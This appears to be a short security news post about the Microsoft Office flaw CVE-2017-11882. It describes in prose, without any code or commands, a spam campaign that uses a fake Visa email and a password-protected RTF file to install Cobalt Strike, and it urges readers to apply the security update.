A Microsoft Word exploit has been active for 17 years, but only discovered and patched earlier this month. CVE-2017-11882 is a remote code execution exploit in Microsoft Office software which exists due to the way the software “handles certain objects in the memory.”
The vulnerability distributes backdoor malware that takes control of the infected system, allowing hackers the ability to access files, execute commands, and more.
The exploit uses Cobalt malware, which is quite potent because it uses the legitimate penetration testing tool, Cobalt Strike, which is used for Adversary Simulations to access a system’s covert channels. Although this malware is newly discovered, attackers have quickly taken advantage of it in hopes of spreading the malware before users install the security update. So far, only Russian speakers have been targeted, by receiving a spam email supposedly from Visa notifying the victim of a rule change in their payWave service.
The message contains a password-protected RTF document, with credentials to open it. The RTF file contains the malware, and the “password protection” hides it from detection. If opened, the malware runs a PowerShell script, which downloads Cobalt Strike and takes control of the victim’s system. PC users who keep current on updates do not need to worry. Those who are slow to update security patches are at risk.